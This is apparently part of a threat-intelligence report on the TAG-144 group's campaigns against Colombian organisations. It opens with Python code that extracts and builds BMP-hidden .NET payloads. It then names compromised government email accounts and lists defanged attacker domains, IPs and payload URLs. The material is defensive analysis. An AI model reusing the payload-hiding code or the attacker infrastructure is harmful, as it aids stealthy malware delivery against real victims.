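    row_stride = (width * 3 + 3) & ~3  # each stored row is padded to a 4-byte boundary
    if pixel_offset + row_stride * height > len(bmp):
        raise ValueError("truncated pixel data")
    out = bytearray()
    for y in range(height):
        file_row = (height - 1 - y) if bottom_up else y
        base = pixel_offset + file_row * row_stride
        for x in range(width):
            b, g, r = bmp[base + 3 * x: base + 3 * x + 3]  # stored as B,G,R on disk
            out += bytes((r, g, b))
    return bytes(out)


def extract_payload(image: bytes) -> Optional[bytes]:
    """Mirror the loader: locate the embedded BMP, read its pixels as a byte stream,
    take a 4-byte little-endian length, then that many payload bytes."""
    start = find_bmp_offset(image)
    if start == -1:
        return None  # the loader also exits silently when the marker is absent
    rgb = bmp_pixels_rgb(image[start:])
    if len(rgb) < 4:
        return None
    length = struct.unpack_from("<i", rgb, 0)[0]
    if length < 0 or 4 + length > len(rgb):
        raise ValueError("length prefix exceeds pixel data")
    # The loader base64-encodes these bytes, applies Replace('A','@').Replace('@','A')
    # (a no-op: every 'A' becomes '@' and every '@' becomes 'A' again) and decodes them,
    # so the assembly it loads is exactly this slice.
    return rgb[4:4 + length]


def build_sample_image(payload: bytes, width: int, height: int) -> bytes:
    """Constructed test fixture: JPEG-like junk (including a decoy 'BM') followed by a
    bottom-up 24-bit BMP whose pixel stream carries the length-prefixed payload."""
    stream = struct.pack("<i", len(payload)) + payload
    if len(stream) > width * height * 3:
        raise ValueError("payload does not fit in the image")
    stream = stream.ljust(width * height * 3, b"\x00")
    row_stride = (width * 3 + 3) & ~3
    rows = []
    for y in range(height):
        row = bytearray()
        for x in range(width):
            i = 3 * (y * width + x)
            r, g, b = stream[i:i + 3]
            row += bytes((b, g, r))
        row += b"\x00" * (row_stride - width * 3)
        rows.append(bytes(row))
    pixels = b"".join(reversed(rows))  # bottom-up storage: y = 0 is written last
    header = b"BM" + struct.pack("<IHHI", BMP_HEADER_LEN + len(pixels), 0, 0, BMP_HEADER_LEN)
    dib = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    junk = b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00" + b"BM" + b"\x00" * 40  # 53 bytes
    return junk + header + dib + pixels


if __name__ == "__main__":
    sample = build_sample_image(b"MZ" + b"constructed assembly bytes", 10, 4)
    print(find_bmp_offset(sample), extract_payload(sample))
```

Run against a retrieved image, a recovered payload for this loader should begin with the MZ header of a PE file, which is what [Reflection.Assembly]::Load expects; if it does not, the marker match was a false positive or the image is not the one the loader fetched. Because the loader keys on the exact header bytes of the embedded bitmap (the $backpack array above), the same prefix is a usable content-level indicator for image files fetched from LIS hosts.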
Execution is carried out by invoking the VAI method within the ClassLibrary1.Home class,\r\nallowing the payload to run without ever being written to disk.\r\nNotably, the same archive[.]org URL was observed in connection with XWorm samples associated with the domains\r\ndeadpoolstart[.]lovestoblog[.]com and\r\ndeadpoolstart2064[.]duckdns[.]org, which also featured similarly named files, including (1, 2):\r\nNUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.js\r\n(SHA256: aee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd)\r\nNUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.rar\r\n(SHA256: 0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1)\r\nVictimology\r\nOverall, Insikt Group identified a significant number of TAG-144 victims, all of which, where attribution was possible, were\r\nColombian entities. Notably, as evidenced by victims associated with Clusters 1 and 2, the majority were directly tied to\r\nColombian government institutions (see Figure 15). Beyond these, additional victims were identified across the healthcare,\r\nretail, transportation, defense, and oil sectors. Importantly, several of these non-governmental entities maintain some degree\r\nof affiliation with the state.\r\nFigure 15: Breakdown of TAG-144 victims observed between May 2024 and July 2025 (Source: Recorded Future)\r\nAlthough TAG-144 has targeted other sectors and has occasionally been linked to intrusions in additional South American\r\ncountries such as Ecuador, as well as Spanish-speaking victims in the US, its primary focus has consistently remained on\r\nColombia, particularly on government entities. 
This persistent targeting raises questions about the threat group’s true\r\nmotivations, such as whether it operates solely as a financially driven threat actor leveraging established tools, techniques,\r\nand monetization strategies, or whether elements of state-sponsored espionage are also at play.\r\nOverlap with Red Akodon\r\nIn May 2024, SCILabs reported on a threat actor it named Red Akodon, which closely resembled Blind Eagle in terms of\r\nTTPs. The threat actor primarily targeted Colombian government entities using RATs such as REMCOS RAT, QuasarRAT,\r\nAsyncRAT, and XWorm. The attacks were delivered via phishing emails posing as legal notices or judicial summonses,\r\nallegedly sent by Colombian institutions like the Fiscalía General de la Nación and the Juzgado 06 Civil del Circuito de\r\nBogotá. Despite the similarities, SCILabs chose to track Red Akodon as a distinct threat actor at the time of writing.\r\nAmong others, the report identified four GitHub repository usernames: “jairpicc”, “santiagonasar”, “colombo08125”, and\r\n“mastermr02456”. Of note, jairpicc also appeared in association with a Pastebin account observed on August 23, 2024 (see\r\nFigure 16).\r\nFigure 16: Pastebin account linked to jairpicc (Source: Recorded Future)\r\nThe Pastebin account was associated with multiple Pastebin links, at least two of which returned Bitbucket URLs hosting\r\nAsyncRAT payloads. These AsyncRAT payloads communicated with domains such as enviasept[.]duckdns[.]org,\r\nenviosep04[.]duckdns[.]org, sost2024ene[.]duckdns[.]org, and trabajo25[.]duckdns[.]org, all linked to TAG-144.\r\nAdditionally, Insikt Group noted that the payloads hosted on these Bitbucket URLs followed file naming conventions\r\nconsistent with those observed in TAG-144 infrastructure. 
For instance, one Pastebin link returned the URL\r\nhxxps://bitbucket[.]org/descargggt/servdifr/downloads/remcoss[.]txt, with the filename remcoss.txt matching file names\r\nfound in open directories previously reported in association with TAG-144. Additional Bitbucket URLs hosting files with\r\nmatching filenames that lead to AsyncRAT infections are provided in Appendix A.\r\nAdditionally, Red Akodon appears to have used at least two likely compromised email addresses associated with Colombian\r\ngovernment entities: nomina[@]magdalena[.]gov[.]co and npereza[@]cendoj[.]ramajudicial[.]gov[.]co. Notably, on\r\nOctober 31, 2024, the Colombian cybersecurity blog ¡Mucho Hacker! reported on related activity involving similar abuse.\r\nThis report highlighted the use of legitimate government-linked email addresses, including abogados[@]hujmb[.]gov[.]co\r\nand j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co. The blog speculated that the threat actor either had access to\r\ninternal systems, allowing them to create legitimate-looking email accounts, or possessed an undisclosed capability to spoof\r\nofficial addresses.\r\nInsikt Group confirmed that the email address j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co is legitimate and seems\r\nto belong to the Juzgado 003 Penal Municipal con Funciones Mixtas de Chiquinquirá. Furthermore, the address was found\r\nin malware logs associated with the Stealc infostealer, suggesting compromise. 
The email appears to be linked to a\r\nColombian public official serving as Secretary of the Second Civil Circuit Court in Chiquinquirá.\r\nThe malware logs also contain email addresses believed to be leveraged for phishing purposes, including:\r\nftorreshe[@]cendoj[.]ramajudicial[.]gov[.]co\r\nj01pmpalchiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\nj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\njcmpalchoconta[@]cendoj[.]ramajudicial[.]gov[.]co\r\nraccionestutj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\nrepchiquinquiraboy[@]cendoj[.]ramajudicial[.]gov[.]co\r\nsilay.salamanca699[@]educacionbogota[.]edu[.]co\r\nInsikt Group assesses that TAG-144 considers the use of compromised government email accounts to deliver spearphishing\r\nemails a standard part of its toolkit and is likely to continue employing this tactic.\r\nMitigations\r\nRecorded Future Threat Intelligence: Recorded Future customers can proactively mitigate threats by\r\noperationalizing data from the Intelligence Cloud. Leverage continuously updated Risk Lists to blocklist IP addresses\r\nassociated with TAG-144, thereby preventing internal communication with known malicious infrastructure.\r\nRecorded Future Detections: Recorded Future provides Sigma, YARA, and Snort rules that can be integrated into\r\nyour SIEM or endpoint detection and response (EDR) tools. These rules detect the presence or execution of malware\r\nfamilies linked to TAG-144 and similar threats.\r\nRecorded Future Network Intelligence: Recorded Future’s Malicious Traffic Analysis (MTA) events help identify\r\nservers engaged in exfiltration activity with known malicious infrastructure. These insights are powered by\r\nproprietary methodologies. 
Use general MTA event queries for broad monitoring, or targeted queries to focus\r\nspecifically on malware families associated with TAG-144.\r\nRecorded Future Monitoring: Use Recorded Future to detect, flag, and block inbound and outbound traffic\r\ninvolving email addresses or domains that show signs of compromise, such as those appearing in data leaks, malware\r\nlogs, or underground forums.\r\nMonitoring for Potential Network Device-Based Threat Activity: Monitor traffic from the IP addresses listed in\r\nAppendix A, which are associated with potentially compromised devices, including Mikrotik routers, and which\r\nhave been observed communicating with known TAG-144 C2 infrastructure.\r\nLIS Flagging and Blocking: Consider blocking the use of specific LIS on your corporate network if not required for\r\nlegitimate purposes. Network defenders must strike a balance between mitigating malicious communication via LIS\r\nand excessively restricting access to services that are allowed or necessary on their network. Previous Insikt Group\r\nreports, such as “Threat Actors Leverage Internet Services to Enhance Data Theft and Weaken Security Defenses,” as\r\nwell as this report on TAG-144, can help inform those decisions.\r\nEmail Traffic Filtering: Implement a robust email filtering system to detect and flag messages containing malicious\r\nattachments or links. Ensure that suspicious emails are quarantined for detailed inspection, reducing the risk of\r\nphishing attacks and credential compromise.\r\nOutlook\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144, active at various points throughout 2024 and\r\n2025. These clusters have primarily targeted Colombian government entities at the local, municipal, and federal levels,\r\nwhile also affecting private sector and non-governmental organizations. 
Although they share common TTPs such as the use\r\nof open-source or cracked RATs, dynamic domain providers, and LIS for staging, each cluster demonstrates distinct\r\ninfrastructure, malware deployment methods, and operational approaches. TAG-144 has also been linked to Red Akodon and\r\nhas been observed using compromised Colombian government email accounts in spearphishing campaigns.\r\nTAG-144 is part of a growing cybercriminal ecosystem in South America, where rapid digitalization and limited cyber\r\ndefenses have contributed to more cybercrime. Looking ahead, Insikt Group assesses that TAG-144 will likely continue to\r\nfocus on Colombian government targets, while maintaining its current operational patterns. This includes continued use of\r\ncompromised email addresses, dynamic DNS services, abuse of LIS, and deployment of customized tools such as the\r\npreviously observed BlotchyQuasar variant of QuasarRAT. TAG-144 is also expected to adapt by integrating new cracked or\r\nopen-source tools and identifying additional LIS platforms to exploit. 
Furthermore, the threat group is likely to deepen its\r\ninvolvement in the broader cybercriminal ecosystem through collaboration with tool developers and affiliated threat actors.\r\nGiven its persistent targeting, technical adaptability, and operational success, Insikt Group assesses that TAG-144 will\r\nremain a significant threat to its typical victim profile for the foreseeable future.\r\nAppendix A: Cluster 1 IP Addresses\r\nIP Address | ASN | Type | Malware Families\r\n45[.]133[.]180[.]26 | AS9009 | TorGuard VPN server | AsyncRAT\r\n45[.]133[.]180[.]154 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]137[.]18 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]137[.]90 | AS9009 | TorGuard VPN server | DcRAT, AsyncRAT, REMCOS RAT\r\n146[.]70[.]50[.]42 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]51[.]42 | AS9009 | TorGuard VPN server | DcRAT\r\n146[.]70[.]57[.]58 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]83[.]218 | AS9009 | TorGuard VPN server | AsyncRAT\r\n181[.]235[.]4[.]255 | AS3816 | Colombian ISP | REMCOS\r\n193[.]56[.]253[.]66 | AS9009 | TorGuard VPN server | REMCOS\r\n93[.]115[.]35[.]146 | AS9009 | TorGuard VPN server | DcRAT\r\nAppendix B: Indicators of Compromise (IoCs)\r\nCluster 1 IP Addresses:\r\n45[.]133[.]180[.]26\r\n45[.]133[.]180[.]154\r\n93[.]115[.]35[.]146\r\n146[.]70[.]50[.]42\r\n146[.]70[.]51[.]42\r\n146[.]70[.]57[.]58\r\n146[.]70[.]83[.]218\r\n146[.]70[.]137[.]18\r\n146[.]70[.]137[.]90\r\n181[.]235[.]4[.]255\r\n181[.]235[.]10[.]163\r\n181[.]235[.]15[.]197\r\n186[.]169[.]48[.]180\r\n186[.]169[.]50[.]123\r\n186[.]169[.]80[.]199\r\n186[.]169[.]80[.]207\r\n186[.]169[.]82[.]147\r\n186[.]169[.]90[.]53\r\n193[.]56[.]253[.]66\r\nCluster 1 
Domains:\r\nalma27[.]duckdns[.]org\r\naseguradotelle[.]duckdns[.]org\r\ndiazpool14[.]duckdns[.]org\r\ndnse2542[.]duckdns[.]org\r\nenvio-18-2[.]duckdns[.]org\r\nenvio01[.]ddns[.]net\r\nenvio02-04[.]duckdns[.]org\r\nenvio05-06[.]duckdns[.]org\r\nenvio07[.]duckdns[.]org\r\nenvio10-04-25[.]duckdns[.]org\r\nenvio1010[.]duckdns[.]org\r\nenvio104[.]duckdns[.]org\r\nenvio11-04[.]duckdns[.]org\r\nenvio14-03[.]duckdns[.]org\r\nenvio14-05[.]duckdns[.]org\r\nenvio1414[.]duckdns[.]org\r\nenvio15-005[.]duckdns[.]org\r\nenvio1515[.]duckdns[.]org\r\nenvio16-05[.]duckdns[.]org\r\nenvio1616[.]duckdns[.]org\r\nenvio19-05[.]duckdns[.]org\r\nenvio19-055[.]duckdns[.]org\r\nenvio1919[.]duckdns[.]org\r\nenvio20-03[.]duckdns[.]org\r\nenvio2020[.]duckdns[.]org\r\nenvio21-005[.]duckdns[.]org\r\nenvio21-05[.]duckdns[.]org\r\nenvio2121[.]duckdns[.]org\r\nenvio2222[.]duckdns[.]org\r\nenvio2333[.]duckdns[.]org\r\nenvio25-03[.]duckdns[.]org\r\nenvio25-04[.]duckdns[.]org\r\nenvio25-3[.]duckdns[.]org\r\nenvio25100255[.]duckdns[.]org\r\nenvio26-005[.]duckdns[.]org\r\nenvio26-03[.]duckdns[.]org\r\nenvio26-05[.]duckdns[.]org\r\nenvio266[.]duckdns[.]org\r\nenvio28-003[.]duckdns[.]org\r\nenvio28[.]duckdns[.]org\r\nenvio29[.]duckdns[.]org\r\nenvio3-04[.]duckdns[.]org\r\nenvio31-03[.]duckdns[.]org\r\nenvio31[.]duckdns[.]org\r\nenvio55[.]duckdns[.]org\r\nenvio6-06[.]duckdns[.]org\r\nenvio666[.]duckdns[.]org\r\nenvioo20020[.]duckdns[.]org\r\nhold-asy[.]duckdns[.]org\r\nnewremco[.]duckdns[.]org\r\nojosostenerfebrero[.]duckdns[.]org\r\npooldiaz14[.]duckdns[.]org\r\nqua25q[.]duckdns[.]org\r\nqua25qua[.]duckdns[.]org\r\nrem25rem[.]duckdns[.]org\r\nremc21[.]duckdns[.]org\r\nrespaldito01[.]duckdns[.]org\r\nrespaldito03[.]duckdns[.]org\r\nrespaldomax3[.]duckdns[.]org\r\nrespaldomax4[.]duckdns[.]org\r\nrespaldomx1[.]duckdns[.]org\r\nrespaldomx2[.]duckdns[.]org\r\nrespaldomx5[.]duckdns[.]org\r\nsend9214[.]duckdns[.]org\r\nsendiadad[.]duckdns[.]org\r\ntrabajonuevos[.]duckdns[.]org\r\nusooo205[.]duckdns[.]org\r\nCluster 2 IP Addresses:\r\n45[.]77[.]72[.]102\r\n64[.]188[.]9[.]172\r\n64[.]188[.]9[.]173\r\n64[.]188[.]9[.]175\r\n64[.]188[.]9[.]177\r\n172[.]93[.]160[.]188\r\n177[.]255[.]84[.]173\r\n179[.]14[.]8[.]131\r\n179[.]14[.]11[.]213\r\n181[.]131[.]217[.]63\r\n191[.]88[.]249[.]175\r\n192[.]169[.]69[.]26\r\nCluster 2 Domains:\r\nagilizavacunate202120212021[.]duckdns[.]org\r\nagosagosagostooo20242024[.]duckdns[.]org\r\nandresbermudez3080[.]duckdns[.]org\r\nandresbermudezrespaldok30[.]duckdns[.]org\r\narannsasaaransasaturituri2024[.]duckdns[.]org\r\narmadnocaballerodominio[.]con-ip[.]com\r\narmandocaceres4050[.]con-ip[.]com\r\narmandoferreiro701020dominio[.]con-ip[.]com\r\narmandovillareal5020[.]con-ip[.]com\r\narmandovillareal502011[.]con-ip[.]com\r\nbriana2024[.]kozow[.]com\r\nbriana4000[.]duckdns[.]org\r\nbrianaf511[.]duckdns[.]org\r\ncamanopetro[.]con-ip[.]com\r\ncamarasdeseguridad202420242024[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncanastapatrones[.]con-ip[.]com\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarmengutierrez9030[.]con-ip[.]com\r\nccerrado10[.]con-ip[.]com\r\ncococovid202420242024[.]duckdns[.]org\r\ncomidafood[.]con-ip[.]com\r\ncopaamerica2022024transmision[.]con-ip[.]com\r\ncristiansantodomingo203010[.]con-ip[.]com\r\ndanielfernandez502010[.]con-ip[.]com\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano8070
2[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\ndesdeseptiempresesiente[.]con-ip[.]com\r\ndiciembrearbolitodebelen20222022[.]duckdns[.]org\r\ndmforjadores[.]con-ip[.]com\r\ndominiharrypotter202420242024[.]duckdns[.]org\r\ndominiogeneral20240202402024[.]duckdns[.]org\r\ndominioseternosgraciasadios20230230230[.]duckdns[.]org\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 18 of 34\n\neneroeneroenero2023202311[.]duckdns[.]org\r\nenvioasy24[.]kozow[.]com\r\nfebreroynoesvisiesto20222022[.]duckdns[.]org\r\nfernandocuellar909080[.]con-ip[.]com\r\nfernandoesquivel707020[.]con-ip[.]com\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfranciscogonzalezdomini[.]con-ip[.]com\r\ngonorreaomegonorrea2021[.]duckdns[.]org\r\nidiotobocaefabmantenio2021[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njuancaf4000[.]duckdns[.]org\r\nlaazcarate202120212021[.]duckdns[.]org\r\nllllllllllllllllllabril26de2021vacunate[.]duckdns[.]org\r\nmarli27[.]duckdns[.]org\r\nmarli27[.]kozow[.]com\r\nmayoelmesdelamosca202422024[.]duckdns[.]org\r\nmayomayomayo202202222022[.]duckdns[.]org\r\nmedicosdelacostasas[.]con-ip[.]com\r\nmetropolispedro16[.]con-ip[.]com\r\nneivanuevasde[.]con-ip[.]com\r\nninosey02[.]con-ip[.]com\r\nnopedro[.]con-ip[.]com\r\nnuevoremremrem20232023[.]duckdns[.]org\r\npasarasaberquecuenta[.]con-ip[.]com\r\npaseoencarro2024[.]con-ip[.]com\r\npasoscon[.]con-ip[.]com\r\npasosconlz[.]con-ip[.]com\r\npasticosmemos[.]con-ip[.]com\r\npenoncaminosdel[.]con-ip[.]com\r\npesosdepesoslibras[.]duckdns[.]org\r\npr1275995[.]con-ip[.]com\r\nmono2024[.]kozow[.]com\r\nprogramahumanitaria202220222022[.]duckdns[.]org\r\npruebadenuevonuevo202024202024[.]duckdns[.]org\r\nqjunioo2024020242024infinito[.]duckdns[.]org\r\nramiromartinelli909070[.]con-ip[.]com\r\nremixripiolo[.]con-ip[.]com\r\nremremrem2021marzo2021[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con
-ip[.]com\r\nsemetiooctubre2022202220222022[.]duckdns[.]org\r\nsuperabrilabrilabril20242024[.]con-ip[.]com\r\nsyscsycsyc20212021[.]duckdns[.]org\r\ntercepico202120212021[.]duckdns[.]org\r\nCluster 2 “deadpoolstart”-Themed Domains:\r\ndeadpoolstart2024[.]con-ip[.]com\r\ndeadpoolstart2025[.]con-ip[.]com\r\ndeadpoolstart2025[.]duckdns[.]org\r\ndeadpoolstart2026[.]con-ip[.]com\r\ndeadpoolstart2026[.]duckdns[.]org\r\ndeadpoolstart2027[.]con-ip[.]com\r\ndeadpoolstart2027[.]duckdns[.]org\r\ndeadpoolstart2028[.]con-ip[.]com\r\ndeadpoolstart2028[.]duckdns[.]org\r\ndeadpoolstart2029[.]con-ip[.]com\r\ndeadpoolstart2029[.]duckdns[.]org\r\ndeadpoolstart2030[.]con-ip[.]com\r\ndeadpoolstart2030[.]duckdns[.]org\r\ndeadpoolstart2033[.]duckdns[.]org\r\ndeadpoolstart2034[.]duckdns[.]org\r\ndeadpoolstart2035[.]duckdns[.]org\r\ndeadpoolstart2036[.]duckdns[.]org\r\ndeadpoolstart2037[.]duckdns[.]org\r\ndeadpoolstart2038[.]duckdns[.]org\r\ndeadpoolstart2041[.]duckdns[.]org\r\ndeadpoolstart2044[.]duckdns[.]org\r\ndeadpoolstart2049[.]duckdns[.]org\r\ndeadpoolstart2051[.]duckdns[.]org\r\ndeadpoolstart2052[.]duckdns[.]org\r\ndeadpoolstart2053[.]duckdns[.]org\r\ndeadpoolstart2054[.]duckdns[.]org\r\ndeadpoolstart2059[.]duckdns[.]org\r\ndeadpoolstart2060[.]duckdns[.]org\r\ndeadpoolstart2061[.]duckdns[.]org\r\ndeadpoolstart2063[.]duckdns[.]org\r\ndeadpoolstart2064[.]duckdns[.]org\r\ndeadpoolstart2065[.]duckdns[.]org\r\nCluster 3 IP Addresses:\r\n181[.]131[.]216[.]206\r\n181[.]131[.]218[.]182\r\n181[.]131[.]219[.]42\r\nCluster 3 
Domains:\r\nandersondavid4070[.]duckdns[.]org\r\nandersondesousa9030[.]con-ip[.]com\r\nandresguerrero90808[.]con-ip[.]com\r\nandresrestrepo901020[.]duckdns[.]org\r\nandressinisterra508070[.]duckdns[.]org\r\nandresvalderrama4070[.]duckdns[.]org\r\nantonioguerrero4050[.]duckdns[.]org\r\narmandocaceres4050[.]con-ip[.]com\r\narmandoquiroz7020[.]duckdns[.]org\r\narmandosandoval70501023[.]duckdns[.]org\r\narmandovillareal504010[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncarloscaicedo4050202[.]duckdns[.]org\r\ncarlosfernandez401020[.]duckdns[.]org\r\ncarlosmendoza504070[.]duckdns[.]org\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarlossantrich9080[.]duckdns[.]org\r\ncarlosurrutia805020[.]duckdns[.]org\r\ncarlosurrutia8050202[.]duckdns[.]org\r\ncarlosvillalba9040[.]duckdns[.]org\r\ncarmengutierrez9030[.]con-ip[.]com\r\ncarmenzavillareal4080[.]duckdns[.]org\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano80702[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\nedgardocarrascal904050[.]duckdns[.]org\r\nfernandocaballero50702[.]duckdns[.]org\r\nfernandogonzalez809010[.]duckdns[.]org\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfernandolopez105040[.]duckdns[.]org\r\nfranciscodaza3090[.]duckdns[.]org\r\ngermancastillo9050[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njaviersandoval9030[.]duckdns[.]org\r\nmiguelurrutia7040[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsandraverdecia708091[.]duckdns[.]org\r\nsantiagovenecia7050[.]duckdns[.]org\r\nsantiagovenecia70502[.]duckdns[.]org\r\nsantiagovillareal101010[.]duckdns[.]org\r\nsebastiancorrea905040[.]duckdns[.]org\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con-ip[.]com\r\nsergiovalderrama2040[.]duckdns[.]org\r\ntrinidadtobago5020[.]duckdns[.]org\r\nvelisariosantiago7080[.]duckdns[.]org\r\nCluster 4 IP 
Addresses:\r\n45[.]135[.]232[.]38\r\n46[.]246[.]82[.]9\r\n89[.]117[.]23[.]25\r\n178[.]73[.]218[.]8\r\n181[.]235[.]3[.]0\r\n191[.]93[.]113[.]151\r\nCluster 4 Domains:\r\naets[.]duckdns[.]org\r\nasxyz[.]duckdns[.]org\r\nasyfas[.]duckdns[.]org\r\nasygo[.]duckdns[.]org\r\nasynpro[.]duckdns[.]org\r\ncamabinga1[.]duckdns[.]org\r\ndcfast[.]duckdns[.]org\r\ndcglos[.]duckdns[.]org\r\ndckazts[.]duckdns[.]org\r\ndcmxz[.]duckdns[.]org\r\ndcuxpag[.]duckdns[.]org\r\ndrgost[.]duckdns[.]org\r\ndrpras[.]duckdns[.]org\r\ndxpam[.]duckdns[.]org\r\nenviasept[.]duckdns[.]org\r\nenviosep04[.]duckdns[.]org\r\nkeepz[.]duckdns[.]org\r\nojososteneragosto[.]duckdns[.]org\r\nqfast[.]duckdns[.]org\r\nrfwr[.]duckdns[.]org\r\nrosks[.]duckdns[.]org\r\nrxsas[.]duckdns[.]org\r\nsost10[.]duckdns[.]org\r\nsost2024ene[.]duckdns[.]org\r\nsostenerdcrat[.]duckdns[.]org\r\nsostenermio2024[.]duckdns[.]org\r\nsostenermio2025[.]duckdns[.]org\r\nsostenerstartup[.]duckdns[.]org\r\ntestedark[.]writesthisblog[.]com\r\nCluster 5 IP 
Addresses:\r\n45[.]133[.]180[.]162\r\n46[.]246[.]4[.]3\r\n46[.]246[.]4[.]9\r\n46[.]246[.]4[.]17\r\n46[.]246[.]4[.]19\r\n46[.]246[.]6[.]4\r\n46[.]246[.]6[.]5\r\n46[.]246[.]6[.]13\r\n46[.]246[.]6[.]20\r\n46[.]246[.]12[.]2\r\n46[.]246[.]12[.]3\r\n46[.]246[.]14[.]2\r\n46[.]246[.]14[.]4\r\n46[.]246[.]14[.]5\r\n46[.]246[.]14[.]7\r\n46[.]246[.]14[.]15\r\n46[.]246[.]14[.]17\r\n46[.]246[.]14[.]21\r\n46[.]246[.]80[.]3\r\n46[.]246[.]80[.]16\r\n46[.]246[.]82[.]9\r\n46[.]246[.]82[.]11\r\n46[.]246[.]82[.]12\r\n46[.]246[.]82[.]16\r\n46[.]246[.]82[.]17\r\n46[.]246[.]82[.]18\r\n46[.]246[.]82[.]19\r\n46[.]246[.]84[.]5\r\n46[.]246[.]84[.]7\r\n46[.]246[.]84[.]10\r\n46[.]246[.]84[.]15\r\n46[.]246[.]84[.]18\r\n46[.]246[.]86[.]4\r\n46[.]246[.]86[.]5\r\n46[.]246[.]86[.]16\r\n46[.]246[.]86[.]18\r\n178[.]73[.]192[.]3\r\n178[.]73[.]192[.]8\r\n178[.]73[.]192[.]12\r\n178[.]73[.]192[.]18\r\n178[.]73[.]218[.]2\r\n178[.]73[.]218[.]7\r\n178[.]73[.]218[.]12\r\n178[.]73[.]218[.]13\r\n178[.]73[.]218[.]17\r\n188[.]126[.]90[.]2\r\n188[.]126[.]90[.]4\r\n188[.]126[.]90[.]9\r\n188[.]126[.]90[.]15\r\n188[.]126[.]90[.]20\r\nCluster 5 
Domains:\r\n2seguro2025[.]duckdns[.]org\r\nansy10jun[.]duckdns[.]org\r\nansy1703[.]duckdns[.]org\r\nasegurar2octubre[.]duckdns[.]org\r\nasegurar3octubre[.]duckdns[.]org\r\nbb2023[.]duckdns[.]org\r\ndcabril[.]duckdns[.]org\r\ngotemburgoxm[.]duckdns[.]org\r\nromanovas[.]duckdns[.]org\r\nURLs:\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_e1502b7358874d6086b38a71038423c2[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_fb2497d842454850a250bf600d899709[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_175c782b52a345e9b408a8449e64f766[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_4ca2665d006b45ec95526f844b1bb6f7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_7d71280008c9462aa54e84600eb9ee6d[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_827908fb62d34a0b988508c8e9333b4a[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_a5260fdbc31b44af9df4b09d3f369843[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ad30f08ca19f483ba511f63ef3d15dd3[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_b476d1da5ee74acb9f4973c91df6852b[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_c9ad47e108e64053a72ec0b686a39a96[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_caf7a77031444a62880f2392b32c04d7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_d8bd099bf2e64e0bbf252e7b31459507[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ddca1f50d908428fa2aba69de178a2ae[.]txt\r\nSHA256 
